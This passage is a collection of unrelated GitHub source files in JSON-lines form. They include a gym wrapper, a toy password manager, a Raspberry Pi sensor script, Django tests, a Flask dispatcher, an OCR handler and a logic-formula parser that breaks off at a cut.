dest_filename)","repo_name":"lmcclurg2314/Deep_Learning_For_PLGA_Analysis","sub_path":"UNT_DOX/FCS_to_Array/Array_to_CSV.py","file_name":"Array_to_CSV.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"4787459455","text":"from typing import Any, Dict, Tuple, Union\n\nfrom gym import Env, Wrapper\nfrom gym.vector import VectorEnv\n\n__all__ = ['RemoveEmptyInfo']\n\n\nclass RemoveEmptyInfo(Wrapper):\n \"\"\"Environment wrapper that replaces all empty info dicts with the same empty dict instance to save memory. Since\n the same placeholder instance is used, you have to make sure that the returned info dict is not modified. 
Also\n works with vector environments.\n\n Arguments:\n env (gym.Env): The environment for which empty info dicts will be replaced with the same empty placeholder dict.\n \"\"\"\n\n def __init__(self, env: Env) -> None:\n super().__init__(env)\n self._is_vector = isinstance(env.unwrapped, VectorEnv)\n self._empty = {}\n\n def step(self, action: Any) -> Tuple[Any, Any, Any, Union[Dict[str, Any], Tuple[Dict[str, Any], ...]]]:\n observation, reward, terminal, info = super().step(action)\n if self._is_vector:\n info = tuple((self._empty if len(i) == 0 else i) for i in info)\n else:\n if len(info) == 0:\n info = self._empty\n return observation, reward, terminal, info\n","repo_name":"jrobine/smaller-world-models","sub_path":"rl/envs/remove_empty_info.py","file_name":"remove_empty_info.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"33289852104","text":"from os import system, name\nimport getpass\nimport os.path\n\n#Clear Function\ndef clear():\n #Windows\n if name == 'nt':\n _ = system('cls')\n #Posix\n else:\n _ = system('clear')\n print(\"\\n .================.\\n / \\\\\\n* CYPHER *\\n \\\\ /\\n '================'\\n\")\n \n\n#Main Menu\ndef menu(sf,key,l):\n clear()\n i=int(input(\"\\n1) Add Credentials\\n2) Show Credentials\\n0) Exit\\n\\n-> \"))\n #Credentional Adder\n if i==1:\n adder(sf,key,l)\n #Show Credentials\n elif i==2:\n looker(sf,key,l)\n #Quit Program\n elif i==0:\n clear()\n print('Exiting...\\n')\n quit()\n #Loop Menu\n else:\n menu(sf,key,l)\n\n#Check Authentication Method\ndef checklog(sf,key,tch,l,cr):\n #Login Authenticator Key\n j=0\n check=''\n #Encrypt Login Key\n for d in tch:\n h=ord(d)+(int(key[j])*(int(key[j])+1))\n if h>126:\n h-=94\n check+=chr(h)\n j+=1\n if j==l:\n j=0\n #Check if Profile exists\n if os.path.isfile(sf) and cr==2:\n f = open(sf,'r')\n f.seek(0)\n c=f.readline()\n j=0\n m=''\n #Decrypt Profile Login Key\n for d in c:\n h=ord(d)-(int(key[j])*(int(key[j])+1))\n if h<32:\n h+=94\n m+=chr(h)\n j+=1\n if j==l:\n j=0\n f.close()\n #Verify Login\n if m[:-1]==tch:\n menu(sf,key,l)\n #Wrong Login\n else:\n clear()\n print('Wrong Password!\\n')\n quit()\n #Create new user Profile\n elif cr == 1 and not(os.path.isfile(sf)):\n f = open(sf,'w')\n f.write(check)\n f.write('\\n')\n f.close()\n menu(sf,key,l)\n elif cr==1:\n clear()\n print(\"User already exists!\")\n input()\n start()\n elif cr==2:\n clear()\n print(\"User doesn't exist!\")\n input()\n start()\n\n#Add new Credentials to user Profile\ndef adder(sf,key,l):\n clear()\n j=0\n #Get New Credentials\n f = open(sf,'a')\n name = input(\"\\nLogin: \")\n secret = getpass.getpass(\"Password: \")\n note = input(\"Note: \")\n tcrp=name+' : '+secret+' ('+note+')'\n c=''\n #Credential Encoder\n for d in tcrp:\n h=ord(d)+(int(key[j])*(int(key[j])+1))\n if h>126:\n h-=94\n c+=chr(h)\n j+=1\n if j==l:\n j=0\n c+='\\n'\n #Save Credentials to File\n f.write(c)\n f.close()\n menu(sf,key,l)\n\n#Look up the Profile Credentials\ndef looker(sf,key,l):\n clear()\n f = open(sf,'r')\n #Credentional Decoder\n for c in f:\n j=0\n m=''\n for d in c:\n h=ord(d)-(int(key[j])*(int(key[j])+1))\n if h<32:\n h+=94\n m+=chr(h)\n j+=1\n if j==l:\n j=0\n #Show Credential\n print(m[:-1])\n getpass.getpass('')\n f.close()\n menu(sf,key,l)\n\n\n#Login Menu\ndef start():\n clear()\n while True:\n cr = int(input(\"\\n1) Create User\\n2) LogIn\\n0) Exit\\n\\n-> \"))\n #Credentional Adder\n if cr == 1 or cr == 2:\n break;\n #Quit 
Program\n elif cr == 0:\n clear()\n print('Exiting...\\n')\n quit()\n login(cr)\n\ndef login(cr): \n clear()\n #Get User Login Info\n usr = list(input(\"User: \"))\n us=''.join(usr)\n pss = list(getpass.getpass(\"Password: \"))\n ps=''.join(pss)\n keyl=[]\n \n #Profile Key Generation Process\n while True:\n try:\n keyl.append(usr.pop(0))\n keyl.append(pss.pop(0))\n except IndexError:\n if len(usr)>0:\n keyl.append(usr.pop(0))\n elif len(pss)>0:\n keyl.append(pss.pop(0))\n else:\n break\n key=''.join(keyl)\n key=''.join(str(ord(c)) for c in key)\n l=len(key)\n \n #Profile file location\n sf='./Profiles/.'+us+'.txt'\n tch=us+' : '+ps+' (Cypher)'\n\n checklog(sf,key,tch,l,cr)\n\n#Program Start\nstart()\n","repo_name":"RicAlvesO/cypher-pe","sub_path":"cype.py","file_name":"cype.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"71158975911","text":"import time\nimport string\nimport operator\nimport RPi.GPIO as GPIO\nimport serial\nfrom smbus import SMBus\n\nREAD_RATE = 1.0\n\n#For I2C\nREAD = 0x0\nI2C = 0x1\nCAL = 0x2\nI = 0x3\n\nDO_DATA_MAX_LENGTH=20\nDO_TERMINATOR = 255\nDO_ADDR = 0x63\nbus = SMBus(1)\n\n#For RS485 (UART)\nBAUD_RATE = 22800\nBRIX_DATA_LENGTH=13\nBRIX_ADDR = 0x01\nCRC_L = 0x44 \nCRC_H = 0x0C\nREAD_CMD = [chr(BRIX_ADDR), chr(0x03), chr(0x00),chr(0x00), chr(0x00), chr(0x08), chr(CRC_L), chr(CRC_H)]\nREAD_CMD_STR = ''.join(READ_CMD)\nser = serial.Serial('/dev/serial0',BAUD_RATE, timeout=1)\n\nclass Master :\n def __init__(self):\n self.DATA = {'DO': '', 'BRIX_TEMP': '', 'BRIX_BRIX' : '' }\n \n def readDO(self):\n res=\"\"\n data=\"\"\n data = bus.read_i2c_block_data(DO_ADDR, READ, DO_DATA_MAX_LENGTH)\n \n for i in range(len(data)):\n if i==0:\n print(\"DO Response Code is %d\" % int(data[i]))\n continue\n tmp = chr(data[i])\n if ord(tmp) ==DO_TERMINATOR: \n break\n res += tmp\n self.DATA['DO'] = res\n\n def readBRIX(self):\n ser.write(READ_CMD_STR)\n data = []\n \n for i in range(BRIX_DATA_LENGTH):\n tmp = ser.read(1)\n try :\n data.append(ord(tmp))\n except :\n data.append(0)\n \n # Temperature\n tmp = data[3]\n for i in range(3):\n tmp = tmp << 4\n tmp = data[i+4]\n self.DATA['BRIX_TEMP']= \"%f\" % tmp\n \n # Brix\n tmp = data[7]\n for i in range(3):\n tmp = tmp << 4\n tmp = data[i+8]\n self.DATA['BRIX_BRIX'] = \"%f\" % tmp\n\n def getAllData(self):\n self.readDO()\n self.readBRIX()\n\n for k in sorted(self.DATA.keys()) :\n print(\"%s = %s\" % ( k , self.DATA[k] ))\n print(\"\")\n\n #For Next Test\n def sendAllData(self):\n pass\n\ndef main():\n READ_RATE = 1.0 \n master = Master() \n \n print(\"1. Read\")\n print(\"2. Rate\")\n print(\"3. Cal\")\n print(\"4. 
Quit\")\n \n\n while True :\n cmd = raw_input(\"Command : \")\n\n if cmd == \"Read\" :\n print(\"Start Reading\")\n print(\"Read Rate is %d\" % READ_RATE)\n\n while True:\n try :\n master.getAllData()\n time.sleep(READ_RATE)\n except KeyboardInterrupt :\n print(\"Stop reading\")\n break\n\n elif cmd == \"Rate\" :\n try:\n READ_RATE = float(raw_input('Enter new Read Rate '))\n except ValueError:\n print('Invalid Read Rate')\n \n elif cmd == \"Cal\" :\n pass\n elif cmd == \"Quit\" :\n break\n\nif __name__ == '__main__' :\n main()\n","repo_name":"ina-uzu/RPi_TEST","sub_path":"MULT/CASE1.py","file_name":"CASE1.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"5995126799","text":"from django.urls import reverse\n\nfrom mixer.backend.django import mixer\n\nfrom articles.models import Author, Article\nfrom blog.tests import BaseTest\n\n\nclass TestArticleListView(BaseTest):\n\n def setUp(self) -> None:\n author = mixer.blend(Author)\n self.article = mixer.blend(Article, author=author)\n self.create_and_login(\"test@test.com\", \"test\")\n\n def test_list(self):\n resp = self.client.get(reverse('articles'))\n\n self.assertEqual(resp.status_code, 200)\n\n data = resp.content.decode('utf-8')\n self.assertIn(self.article.title, data)\n\n def test_unauthorized(self):\n self.logout()\n\n resp = self.client.get(reverse('articles'))\n self.assertRedirects(resp, reverse('login'))\n\n\nclass TestArticleCreateView(BaseTest):\n\n def setUp(self) -> None:\n self.create_and_login(\"test@test.com\", \"test\")\n\n self.data = {\n 'title': 'Test title',\n 'text': 'Test text',\n 'author': mixer.blend(Author).pk\n }\n\n def test_create(self):\n resp = self.client.post(reverse('articles-create'), data=self.data)\n self.assertRedirects(resp, reverse('articles'))\n\n article = Article.objects.get(title=self.data['title'].upper())\n self.assertEqual(article.text, self.data['text'])\n self.assertEqual(article.author.pk, self.data['author'])\n\n def test_create_without_author(self):\n self.fail(\"Write later\")\n\n def test_unauthorized(self):\n self.logout()\n\n resp = self.client.get(reverse('articles-create'))\n self.assertRedirects(resp, reverse('login'))","repo_name":"MikhailKravets/group_blog","sub_path":"articles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32891656792","text":"#!/usr/bin/python\r\n# - Purpose:\r\n# \r\n# - Author:\r\n# \r\n# - Contact for questions and/or comments:\r\n# \r\n# - Parameters:\r\n# < accepted arguments>\r\n# - Version Releases and modifications.\r\n# \r\n\r\n### START OF MODULE IMPORTS\r\nimport sys\r\nfrom subprocess import Popen, PIPE\r\nfrom collections import Counter\r\n### END OF MODULE IMPORTS\r\n\r\n### START OF GLOBAL VARIABLES DECLARATION\r\nARGS = sys.argv\r\nNARGS = len(ARGS[1:])\r\n\r\n### END OF GLOBAL VARIABLES DECLARATION\r\n\r\n### START OF FUNCTIONS DECLARATION\r\n# --------------------------------------------------------------- #\r\ndef parse_args():\r\n \"\"\"\r\n Purpose:\r\n To check validity of number and values of the arguments given\r\n Parameters:\r\n \"\"\"\r\n if NARGS != 1:\r\n print(\"Usage: {} \".format(ARGS[0]))\r\n exit(1)\r\n# --------------------------------------------------------------- #\r\n### END OF FUNCTIONS DECLARATION\r\n\r\n### START OF CLASS DEFINITIONS\r\n# 
--------------------------------------------------------------- #\r\n# --------------------------------------------------------------- #\r\n### END OF CLASS DEFINITIONS\r\n\r\n### START OF MAIN PROGRAM\r\nparse_args()\r\nuser=ARGS[1]\r\nprocs = list()\r\nreport = dict()\r\nans_cmd = [\"/usr/bin/ps\", \"-o\", \"comm\", \"-u\", user]\r\n\r\n# Running the command\r\noutput = Popen(ans_cmd, stdout=PIPE, stderr=PIPE)\r\n\r\n# Parsing the process output\r\nfor line in output.stdout:\r\n if \"COMM\" not in line:\r\n procs.append(line.strip('\\n'))\r\n\r\nreport['Total Procs'] = len(procs) # Number of Procs\r\nreport.update(Counter(procs)) # Counting the Procs\r\n\r\n# Printing the output\r\nprint('Total Procs:{};{}'.format(report.pop('Total Procs'),str(report).strip('{').strip('}'))\r\n .replace(', ',';').replace(': ',':'))\r\n\r\n### END OF MAIN PROGRAM","repo_name":"rudaum/EasyManagement-20180911","sub_path":"main/lib/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"70714077029","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 21 15:57:53 2021\r\n\r\n@author: kingb\r\n\"\"\"\r\n###电影天堂部分电影下载链接\r\n\r\n#1、获取首页源码\r\n#2、筛选目标代码\r\n#3、进入下载页面获取url\r\n#4、遍历写入文件\r\n\r\nimport requests\r\nimport re\r\nimport csv\r\n\r\n#1、获取首页源码\r\nurl = 'https://www.dytt8.net/index.htm'\r\nresp = requests.get(url,verify=False)\r\nresp.encoding = 'gbk'\r\n\r\n\r\n#2、筛选目标代码\r\nojb1 = re.compile('新片精品.*?
<ul>(?P<ul>.*?)</ul>',re.S)\r\nojb2 = re.compile("<a href='(?P<indx>.*?)'",re.S)\r\nojb3 = re.compile('◎片  名(?P<name>.*?)<br />
.*?href=\"(?P.*?)\"',re.S)\r\nresult1 = ojb1.search(resp.text)\r\nresult2 = ojb2.finditer(result1.group())\r\n\r\nf = open('http.csv',mode='w',encoding='utf-8')\r\nwrit = csv.writer(f)\r\n#3、进入下载页面获取url\r\ndic = {}\r\nfor it in result2:\r\n resp2 = requests.get('https://www.dytt8.net'+it.group('indx'),verify=False)\r\n resp2.encoding = 'gbk'\r\n result3 = ojb3.search(resp2.text)\r\n dic = result3.groupdict()\r\n writ.writerow(dic.values())#4、遍历写入文件\r\nf.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"tianhao99/Python","sub_path":"Python练习/re电影天堂下载链接.py","file_name":"re电影天堂下载链接.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23073237395","text":"import os\nimport os.path as osp\nimport numpy as np\nimport random\n#import matplotlib.pyplot as plt\nimport collections\nimport torch\nimport torchvision\nfrom torch.utils import data\nfrom PIL import Image\n\nclass cityscapesDataSetLabel(data.Dataset):\n def __init__(self, root, list_path, max_iters=None, crop_size=(321, 321), mean=(128, 128, 128), set='val', label_folder=None,translated=False):\n self.root = root\n self.list_path = list_path\n self.crop_size = crop_size\n self.mean = mean\n self.img_ids = [i_id.strip() for i_id in open(list_path)]\n self.translated=translated\n if translated == True:\n self.img_ids = [i_id.split('/')[-1] for i_id in self.img_ids]\n else:\n self.root=osp.join(self.root, \"leftImg8bit\")\n if not max_iters==None:\n self.img_ids = self.img_ids * int(np.ceil(float(max_iters) / len(self.img_ids)))\n self.files = []\n self.set = set\n self.label_folder = label_folder\n name = self.img_ids[0]\n print(osp.join(self.root, \"%s/%s\" % (self.set, name)))\n if self.translated == True:\n print(self.label_folder + \"/%s\" % name)\n else:\n print(self.label_folder+\"/%s\" %name.split('/')[1])\n def __len__(self):\n return len(self.img_ids)\n\n def __getitem__(self, index):\n name = self.img_ids[index]\n image = Image.open(osp.join(self.root, \"%s/%s\" % (self.set, name))).convert('RGB')\n if self.translated==True:\n label = Image.open(self.label_folder+\"/%s\" %name)\n else:\n label = Image.open(self.label_folder+\"/%s\" %name.split('/')[1])\n # resize\n image = image.resize(self.crop_size, Image.BICUBIC)\n image = np.asarray(image, np.float32)\n label = np.asarray(label, np.float32)\n size = image.shape\n image = image[:, :, ::-1] # change to BGR\n image -= self.mean\n image = image.transpose((2, 0, 1))\n return image.copy(), label.copy(), np.array(size), name\n","repo_name":"royee182/DPL","sub_path":"DPL_master/data/cityscapes_dataset_label.py","file_name":"cityscapes_dataset_label.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"71"} +{"seq_id":"38322826059","text":"from random import *\n\nm = []\nk = 0\nmaximum = 0\ns = []\n\nrow = int(input('input n of row = '))\nline = int(input('input n of line = '))\n\ndef chet(massive):\n summ = 0\n for i in massive:\n if i >= 0 and i % 2 == 0:\n summ += i\n return(summ)\n\nfor i in range(row):\n a = []\n for j in range(line):\n a.append(randint(-10,10))\n m.append(a)\n if 0 not in a:\n k = k + 1\n\nwill_sorted = sorted(m,key=chet)\nprint('Отсортированный массив:',*will_sorted,sep='\\n')\nprint('Количество строк, не содержащих ни одного нулевого 
элемента',k)","repo_name":"Salamander-m/mf","sub_path":"python andreev/lab_5/lab_5_2.py","file_name":"lab_5_2.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71838713831","text":"import os\nimport re\nimport flask\nimport engineio\nimport light.helper\n\nfrom http import cookies\nfrom light.cache import Cache\nfrom light.constant import Const\nfrom light.model.datarider import Rider\nfrom light.http.context import Context\nfrom light.configuration import Config\nfrom light.http import response, websocket\nfrom light.i18n import I18n\n\nCONST = Const()\nMETHODS = ['GET', 'POST', 'PUT', 'DELETE', 'GET', 'GET', 'GET', 'GET']\n\n\ndef dispatch(app):\n bind_api(app)\n bind_route(app)\n return bind_websocket(app)\n\n\ndef bind_websocket(app):\n if os.getenv(CONST.ENV_LIGHT_APP_WEBSOCKET, 'on') == 'off':\n return\n\n async_mode = 'gevent_uwsgi'\n if os.getenv(CONST.ENV_LIGHT_APP_DEV) == 'true':\n async_mode = 'gevent'\n\n eio = engineio.Server(async_mode=async_mode)\n\n @eio.on('connect')\n def connect(sid, environ):\n print('websocket connect')\n\n cookie = cookies.SimpleCookie(environ['HTTP_COOKIE'])\n session = websocket.create_session(app, cookie)\n websocket.connect(sid, eio, session, environ)\n\n @eio.on('disconnect')\n def disconnect(sid):\n print('websocket disconnect')\n websocket.disconnect(sid)\n\n @eio.on('message')\n def message(sid, data):\n websocket.message(sid, data)\n\n return eio\n\n\ndef bind_api(app):\n boards = Cache.instance().get(CONST.SYSTEM_DB_BOARD)\n rider = Rider.instance()\n\n for board in boards:\n\n action = board['action']\n api = board['api']\n class_name = board['class']\n class_folder = board['path']\n method = board['type']\n print('>>>> ', api, class_name, action, METHODS[method])\n\n # try lookup controllers class\n path = light.helper.project_path('controllers', class_folder)\n clazz = light.helper.resolve(name=class_name, path=path)\n if clazz:\n if hasattr(clazz, action):\n add_api_rule(app, api, clazz, action, method)\n continue\n\n # try lookup system class\n path = light.helper.core_path('model')\n clazz = light.helper.resolve(name=class_name, path=path)\n if clazz:\n if hasattr(clazz, action):\n add_api_rule(app, api, clazz, action, method)\n continue\n\n # try lookup data rider\n if hasattr(rider, class_name):\n clazz = getattr(rider, class_name)\n if hasattr(clazz, action):\n add_api_rule(app, api, clazz, action, method)\n continue\n\n\ndef bind_route(app):\n routes = Cache.instance().get(CONST.SYSTEM_DB_ROUTE)\n\n for route in routes:\n action = route['action']\n url = route['url']\n class_name = route['class']\n template = route['template']\n print('>>>> ', url, action, template)\n\n # try lookup controllers class\n path = light.helper.project_path('controllers')\n clazz = light.helper.resolve(name=class_name, path=path)\n if clazz:\n if hasattr(clazz, action):\n add_html_rule(app, url, clazz, action, template)\n continue\n\n # render html\n add_html_rule(app, url, None, None, template)\n\n\ndef add_api_rule(app, api, clazz, action, method):\n def func(**kwargs):\n handler = Context()\n handler.extend_params(kwargs)\n data, error = getattr(clazz, action)(handler)\n return response.send(handler, data, error)\n\n api = re.sub('/:(\\w+)', '/<\\\\1>', api)\n app.add_url_rule(api, endpoint=api, view_func=func, methods=[METHODS[method]])\n\n\ndef add_html_rule(app, url, clazz, action, template):\n def func(**kwargs):\n handler = Context()\n 
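        # kwargs holds the URL path parameters captured by Flask ('/:name' segments are rewritten to '/<name>' when the rule is registered); they are merged into the handler's params next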
handler.extend_params(kwargs)\n\n data = dict()\n data['req'] = flask.request\n data['handler'] = handler\n data['user'] = handler.user\n data['conf'] = Config()\n data['environ'] = os.environ\n data['dynamic'] = func_dynamic\n data['csrftoken'] = flask.g.csrftoken\n data['i'] = I18n.instance().i\n data['catalog'] = I18n.instance().catalog\n\n if clazz:\n data['data'] = getattr(clazz, action)(handler)\n\n return light.helper.load_template(template).render(data)\n\n url = re.sub('/:(\\w+)', '/<\\\\1>', url)\n app.add_url_rule(url, endpoint=url, view_func=func)\n\n\ndef func_dynamic(url):\n static = Config.instance().app.static\n stamp = Config.instance().app.stamp\n\n if '?' in url:\n return '{url}&stamp={stamp}'.format(static=static, url=url, stamp=stamp)\n\n return '{static}{url}?stamp={stamp}'.format(static=static, url=url, stamp=stamp)\n","repo_name":"Python3pkg/LightCorePy","sub_path":"light/http/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"35661735399","text":"from odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\nclass AccountBankStatement(models.Model):\n _inherit = 'account.bank.statement'\n\n name = fields.Char(string='Reference',\n states={'open': [('readonly', False)]},\n copy=False,\n readonly=True,\n compute=\"_compute_name\",\n store=True)\n \n @api.depends('move_line_ids.move_id.name')\n def _compute_name(self):\n for line in self.move_line_ids:\n ref = ''\n if line.move_id:\n name = line.move_id.mapped(\"name\")\n for move in name:\n ref += move\n self.name = ref\n\n","repo_name":"soikat9/GLS_UAT_FINAL7_USER","sub_path":"od_journal_sequence/models/account_bank_statement.py","file_name":"account_bank_statement.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72038885671","text":"import torch\nfrom transformers import T5ForConditionalGeneration,T5Tokenizer\nimport nltk\nnltk.download('punkt')\nnltk.download('brown')\nnltk.download('wordnet')\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nimport string\nimport pke\nimport traceback\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import sent_tokenize\nfrom flashtext import KeywordProcessor\nimport random\nimport numpy as np\nfrom utils import logger\n\nclass Helper:\n def __init__(self):\n # Initializing the logger object\n self.file_object = open(\"./Logs/helper_log.txt\", 'a+')\n self.log_writer = logger.App_Logger()\n \n def set_seed(self, seed: int):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n \n def postprocesstext (self, content):\n try:\n final=\"\"\n for sent in sent_tokenize(content):\n sent = sent.capitalize()\n final = final +\" \"+sent\n return final\n \n except Exception as ex:\n self.log_writer.log(self.file_object, 'Error occured while running the postprocesstext function. 
Error:: %s' % ex)\n raise ex\n \n def summarizer(self, text):\n \"\"\"\n Text summarization using T5-base model.\n \"\"\"\n try:\n model = T5ForConditionalGeneration.from_pretrained('t5-base')\n tokenizer = T5Tokenizer.from_pretrained('t5-base')\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = model.to(device)\n text = text.strip().replace(\"\\n\",\" \")\n text = \"summarize: \"+text\n max_len = 512\n encoding = tokenizer.encode_plus(text,max_length=max_len, pad_to_max_length=False,truncation=True, return_tensors=\"pt\").to(device)\n\n input_ids, attention_mask = encoding[\"input_ids\"], encoding[\"attention_mask\"]\n\n outs = model.generate(input_ids=input_ids,\n attention_mask=attention_mask,\n early_stopping=True,\n num_beams=3,\n num_return_sequences=1,\n no_repeat_ngram_size=2,\n min_length = 75,\n max_length=300)\n\n\n dec = [tokenizer.decode(ids,skip_special_tokens=True) for ids in outs]\n summary = dec[0]\n summary = self.postprocesstext(summary)\n summary= summary.strip()\n return summary\n \n except Exception as ex:\n self.log_writer.log(self.file_object, 'Error occured while running the summerizer function. Error:: %s' % ex)\n raise ex\n \n def get_nouns_multipartite(self, content):\n \"\"\" \n Answer Span Extraction (Keywords and Noun Phrases)\n \"\"\"\n out=[]\n try:\n extractor = pke.unsupervised.MultipartiteRank()\n extractor.load_document(input=content)\n # not contain punctuation marks or stopwords as candidates.\n pos = {'PROPN','NOUN'}\n #pos = {'PROPN','NOUN'}\n stoplist = list(string.punctuation)\n stoplist += ['-lrb-', '-rrb-', '-lcb-', '-rcb-', '-lsb-', '-rsb-']\n stoplist += stopwords.words('english')\n extractor.candidate_selection(pos=pos, stoplist=stoplist)\n # build the Multipartite graph and rank candidates using random walk,\n # alpha controls the weight adjustment mechanism, see TopicRank for\n # threshold/method parameters.\n extractor.candidate_weighting(alpha=1.1,\n threshold=0.75,\n method='average')\n keyphrases = extractor.get_n_best(n=15)\n \n for val in keyphrases:\n out.append(val[0])\n return out\n \n except Exception as ex:\n self.log_writer.log(self.file_object, 'Error occured while running the summerizer function. Error:: %s' % ex)\n raise ex\n \n def get_keywords(self, originaltext,summarytext):\n try:\n keywords = self.get_nouns_multipartite(originaltext)\n print (\"keywords unsummarized: \",keywords)\n keyword_processor = KeywordProcessor()\n for keyword in keywords:\n keyword_processor.add_keyword(keyword)\n\n keywords_found = keyword_processor.extract_keywords(summarytext)\n keywords_found = list(set(keywords_found))\n print (\"keywords_found in summarized: \",keywords_found)\n\n important_keywords =[]\n for keyword in keywords:\n if keyword in keywords_found:\n important_keywords.append(keyword)\n\n return important_keywords[:4]\n \n except Exception as ex:\n self.log_writer.log(self.file_object, 'Error occured while running the get_keywords function. 
Error:: %s' % ex)\n raise ex","repo_name":"dipesg/Question-and-Answer","sub_path":"utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":5198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"25691301419","text":"class Solution:\r\n def findErrorNums(self, nums: List[int]) -> List[int]:\r\n check = set(range(1,len(nums)+1))\r\n \r\n res = []\r\n \r\n for i in nums:\r\n if i in check:\r\n check.remove(i)\r\n \r\n else:\r\n res.append(i) \r\n \r\n res.extend(list(check))\r\n return res","repo_name":"kumar-vasu/100daysofcode2022","sub_path":"Day56/leetcode_645.py","file_name":"leetcode_645.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18156659924","text":"from maps.models import Map\nfrom wms.models import Layer\n\ndef set_server(server):\n for m in Map.objects.filter(name__istartswith='cluster'):\n for layer in m.layer_set.all():\n layername = layer.layer.layername\n try:\n new_layer = server.layer_set.get(layername=layername)\n except Layer.DoesNotExist:\n continue\n layer.layer = new_layer\n layer.save(update_fields=('layer',))\n ","repo_name":"acaciawater/gw4e","sub_path":"maps/scripts/set_server.py","file_name":"set_server.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16186364049","text":"try:\n import Image\nexcept ImportError as e:\n from PIL import Image\n\nimport io\nimport pytesseract\nimport urllib.request\nimport os\nfrom uuid import uuid4\nfrom urllib.parse import urlparse\nfrom os.path import splitext\nimport base64\nimport binascii\n\n\nALLOWED_IMAGE_TYPE = [\".jpeg\", \".png\", \".jpg\"]\n\ndef get_ext(url):\n parsed = urlparse(url)\n _, ext = splitext(parsed.path)\n return ext\n\n\ndef save_image_from_url(url):\n \"\"\"Saves image from an URL to local and retruns path\"\"\"\n \n ext = get_ext(url)\n local_file_path = \"/tmp/\" + str(uuid4()) + ext\n urllib.request.urlretrieve(url, local_file_path)\n return local_file_path\n\n\ndef save_image_from_base64(encoded_string, ext):\n \"\"\"Saves image to local from base64 encoded string and returns path\"\"\"\n\n local_file_path = \"/tmp/\" + str(uuid4()) + \".\" + ext\n with open(local_file_path, \"wb\") as fh:\n fh.write(base64.decodebytes(bytes(encoded_string, 'utf-8')))\n return local_file_path\n\n\ndef get_image_format(base64_string):\n \"\"\"returns image format from base64 encoded string\"\"\"\n\n image_stream = io.BytesIO((base64.b64decode(base64_string)))\n image = Image.open(image_stream)\n return image.format\n\n\ndef handle(req):\n try:\n base64.decodebytes(bytes(req, 'utf-8'))\n\n try:\n image_format = get_image_format(req)\n if image_format not in ['JPG', 'JPEG', 'PNG']:\n print(\"Only JPEG or PNG images are allowed.\")\n return\n file_path = save_image_from_base64(req, image_format)\n \n except OSError as e:\n print(\"Not a valid image file. 
Only JPEG or PNG images base64 encoded are acceptable inputs.\")\n return\n\n except binascii.Error:\n if not len(req):\n print(\"Request body is missing.\")\n return\n \n if get_ext(req) not in ALLOWED_IMAGE_TYPE:\n print(\"Only JPEG or PNG images are allowed.\")\n return\n \n file_path = save_image_from_url(req)\n \n img = Image.open(file_path)\n text = pytesseract.image_to_string(img, lang='eng')\n os.remove(file_path)\n print(text)\n","repo_name":"viveksyngh/openfaas-ocr","sub_path":"openfaas-ocr/function/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"71"} +{"seq_id":"16732331916","text":"import json\nfrom models.Binary import Binary\nfrom models.Enums import Connective, Quantifier, Type\nfrom models.Formula import Formula\nfrom models.Function import Function\nfrom models.Unary import Unary\nfrom models.Variable import Variable\n\ndef create_formula_from_json(json_data: json) -> Formula:\n formula_type = json_data['formula_type']\n\n if Type(formula_type) == Type.BINARY:\n left = create_formula_from_json(json_data['left'])\n right = create_formula_from_json(json_data['right'])\n connective = Connective(json_data['connective'])\n is_clause = json_data['is_clause']\n var_count = json_data['var_count']\n quant_list = json_data['quant_list']\n\n return Binary(\n left,\n right,\n connective,\n is_clause,\n var_count,\n quant_list\n )\n if Type(formula_type) == Type.UNARY:\n inside = create_formula_from_json(json_data['inside'])\n quantifier = Quantifier(json_data['quantifier'])\n negation = json_data['negation']\n quant_var = json_data['quant_var']\n var_count = json_data['var_count']\n quant_list = json_data['quant_list']\n\n return Unary(\n inside,\n 